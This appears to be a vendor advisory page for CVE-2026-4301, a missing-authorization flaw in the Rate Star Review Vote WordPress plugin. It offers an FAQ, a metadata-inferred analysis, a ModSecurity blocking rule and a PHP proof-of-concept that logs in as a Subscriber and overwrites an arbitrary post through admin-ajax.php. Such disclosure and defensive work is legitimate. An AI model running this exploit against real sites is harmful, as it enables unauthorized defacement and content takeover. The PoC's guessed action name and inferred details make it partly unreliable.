What is CVE-2026-4301?

CVE-2026-4301 is a security vulnerability in the Rate Star Review Vote plugin for WordPress, specifically in version 1.6.4 and earlier. It allows authenticated users with Subscriber-level access to modify arbitrary posts and pages due to missing authorization checks in the AJAX handler.

How does the vulnerability work?

The vulnerability exists because the `vwrsr_review()` AJAX handler does not perform proper capability checks or nonce verification. When the ‘form’ parameter is set to ‘update’, it allows an attacker to submit a ‘rating_id’ parameter that can reference any post ID, leading to unauthorized modifications.

Who is affected by this vulnerability?

Any WordPress site using the Rate Star Review Vote plugin version 1.6.4 or earlier is affected. Additionally, authenticated users with Subscriber-level access or higher can exploit this vulnerability to modify posts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Rate Star Review Vote plugin you are using. If it is version 1.6.4 or earlier, your site is at risk. Review your user roles to see if any authenticated users have Subscriber-level access.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2026-4301 is 4.3, categorized as medium severity. This indicates that while the vulnerability does not pose an immediate critical risk, it can lead to significant integrity issues if exploited by an authenticated user.

What are the practical risks of this vulnerability?

Successful exploitation allows an attacker to change the title, content, author, and metadata of any post or page on the site. This can lead to content takeover, misinformation, or insertion of malicious content, compromising the integrity of the site.

How can I fix or mitigate this issue?

To mitigate this vulnerability, update the Rate Star Review Vote plugin to the latest version where the issue is resolved. Additionally, implement capability checks using `current_user_can()` and nonce verification in the AJAX handler to prevent unauthorized access.

What should developers do to secure their plugins?

Developers should ensure proper authorization checks are in place for all AJAX handlers, validate and sanitize user inputs, and implement nonce verification to protect against CSRF attacks. Regular security audits and code reviews can also help identify potential vulnerabilities.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an attacker can log in as a user with Subscriber-level access and send a crafted POST request to modify a target post. It illustrates the lack of authorization checks by demonstrating how arbitrary post modifications can be achieved.

What is the role of nonce verification in this context?

Nonce verification is crucial in AJAX requests to prevent cross-site request forgery (CSRF) attacks. By implementing nonce checks, developers can ensure that requests to modify posts are legitimate and originate from authenticated users.

Can this vulnerability affect other plugins or themes?

While this specific vulnerability affects the Rate Star Review Vote plugin, similar vulnerabilities can exist in other plugins or themes that lack proper authorization checks. It is essential to review all plugins for security best practices.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Rate Star Review Vote plugin to prevent exploitation. Additionally, review user roles and limit access for authenticated users until a fix can be applied.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 11, 2026

CVE-2026-4301: Rate Star Review Vote <= 1.6.4 – Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Modification via 'rating_id' Parameter (rate-star-review)

CVE ID CVE-2026-4301

Plugin rate-star-review

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 1.6.4

Patched Version —

Disclosed May 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4301 (metadata-based):

This vulnerability allows authenticated attackers with Subscriber-level access to modify arbitrary posts and pages on a WordPress site. The flaw exists in the Rate Star Review Vote plugin, version 1.6.4 and earlier. The affected component is the `vwrsr_review()` AJAX handler. The CVSS score is 4.3 (medium), reflecting the low integrity impact but requiring minimal access privileges.

Root Cause: The `vwrsr_review()` AJAX handler lacks authorization checks. Atomic Edge analysis infers that the plugin only verifies a user is logged in via `is_user_logged_in()` but does not implement capability checks or nonce verification. When the ‘form’ parameter equals ‘update’, the function accepts a ‘rating_id’ GET parameter containing an arbitrary post ID. It then passes this ID to `wp_update_post()` and `update_post_meta()`. This allows any authenticated user to modify post title, content, author, post type, and metadata. These conclusions are inferred from the CWE-862 classification and the provided description, as no source code diff is available.

Exploitation: An attacker can exploit this by sending a crafted POST request to `/wp-admin/admin-ajax.php` with the action parameter set to the plugin’s AJAX hook (likely `vwrsr_review` or similar), the ‘form’ parameter set to ‘update’, and the ‘rating_id’ parameter set to the target post ID. Additional POST parameters such as ‘title’, ‘content’, and ‘author’ can be included to overwrite the post’s contents. The attacker must be logged in with Subscriber-level privileges or higher.

Remediation: Based on the CWE, the plugin developers should implement proper capability checks using `current_user_can()` with appropriate capabilities like ‘edit_posts’ or ‘edit_others_posts’ before allowing post updates. Nonce verification should also be added using `wp_verify_nonce()` to prevent cross-site request forgery. Validation and sanitization of the ‘rating_id’ parameter should be enforced to ensure it only allows valid review post IDs belonging to the current user.

Impact: Successful exploitation allows an authenticated attacker to modify any post or page on the site. This includes changing title, content, author, post type, and metadata. The attacker can take over existing content, potentially inserting malicious content or altering critical information. The impact is limited to integrity, with no direct confidentiality or availability impact.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-4301 (metadata-based)
# Blocks exploitation of missing authorization in Rate Star Review Vote AJAX handler
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20264301,phase:2,deny,status:403,chain,msg:'CVE-2026-4301 - Rate Star Review Vote Missing Authorization via AJAX',severity:'CRITICAL',tag:'CVE-2026-4301'"
  SecRule ARGS_POST:action "@streq vwrsr_review" "chain"
    SecRule ARGS_POST:form "@streq update" "chain"
      SecRule ARGS_POST:rating_id "@rx ^[0-9]+$" ""

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4301 - Rate Star Review Vote <= 1.6.4 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Modification

<?php
// Configuration - set these values
$target_url = 'https://example.com'; // Change to target WordPress site
$username = 'attacker'; // WordPress username with Subscriber role or higher
$password = 'password';
$target_post_id = 1; // ID of the post/page to modify

// Login to WordPress
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$response = curl_exec($ch);
curl_close($ch);

if (empty(curl_getinfo($ch, CURLINFO_HTTP_CODE)) || curl_getinfo($ch, CURLINFO_HTTP_CODE) != 200) {
    die('Login failed');
}

// AJAX request to exploit the vulnerability
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = [
    'action' => 'vwrsr_review', // Inferred AJAX action; adjust if needed
    'form' => 'update',
    'rating_id' => $target_post_id,
    'title' => 'Hacked by Atomic Edge Research', // New title
    'content' => 'This post was modified via CVE-2026-4301.', // New content
    'author' => null // Optional: set to attacker's user ID if known
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "Exploit executed. Check post ID: " . $target_post_id;
} else {
    echo "Exploit may have failed. HTTP code: " . $http_code;
}

// Clean up
unlink('/tmp/cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-4301?
Overview of the vulnerability
CVE-2026-4301 is a security vulnerability in the Rate Star Review Vote plugin for WordPress, specifically in version 1.6.4 and earlier. It allows authenticated users with Subscriber-level access to modify arbitrary posts and pages due to missing authorization checks in the AJAX handler.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists because the `vwrsr_review()` AJAX handler does not perform proper capability checks or nonce verification. When the ‘form’ parameter is set to ‘update’, it allows an attacker to submit a ‘rating_id’ parameter that can reference any post ID, leading to unauthorized modifications.
Who is affected by this vulnerability?
Identifying vulnerable users and systems
Any WordPress site using the Rate Star Review Vote plugin version 1.6.4 or earlier is affected. Additionally, authenticated users with Subscriber-level access or higher can exploit this vulnerability to modify posts.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the Rate Star Review Vote plugin you are using. If it is version 1.6.4 or earlier, your site is at risk. Review your user roles to see if any authenticated users have Subscriber-level access.
What is the CVSS score and what does it mean?
Understanding the severity rating
The CVSS score for CVE-2026-4301 is 4.3, categorized as medium severity. This indicates that while the vulnerability does not pose an immediate critical risk, it can lead to significant integrity issues if exploited by an authenticated user.
What are the practical risks of this vulnerability?
Implications of exploitation
Successful exploitation allows an attacker to change the title, content, author, and metadata of any post or page on the site. This can lead to content takeover, misinformation, or insertion of malicious content, compromising the integrity of the site.
How can I fix or mitigate this issue?
Recommended actions for remediation
To mitigate this vulnerability, update the Rate Star Review Vote plugin to the latest version where the issue is resolved. Additionally, implement capability checks using `current_user_can()` and nonce verification in the AJAX handler to prevent unauthorized access.
What should developers do to secure their plugins?
Best practices for plugin security
Developers should ensure proper authorization checks are in place for all AJAX handlers, validate and sanitize user inputs, and implement nonce verification to protect against CSRF attacks. Regular security audits and code reviews can also help identify potential vulnerabilities.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploitation example
The proof of concept provided shows how an attacker can log in as a user with Subscriber-level access and send a crafted POST request to modify a target post. It illustrates the lack of authorization checks by demonstrating how arbitrary post modifications can be achieved.
What is the role of nonce verification in this context?
Importance of nonce in AJAX requests
Nonce verification is crucial in AJAX requests to prevent cross-site request forgery (CSRF) attacks. By implementing nonce checks, developers can ensure that requests to modify posts are legitimate and originate from authenticated users.
Can this vulnerability affect other plugins or themes?
Scope of impact beyond the affected plugin
While this specific vulnerability affects the Rate Star Review Vote plugin, similar vulnerabilities can exist in other plugins or themes that lack proper authorization checks. It is essential to review all plugins for security best practices.
What should I do if I cannot update the plugin immediately?
Temporary measures to reduce risk
If immediate updates are not possible, consider disabling the Rate Star Review Vote plugin to prevent exploitation. Additionally, review user roles and limit access for authenticated users until a fix can be applied.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations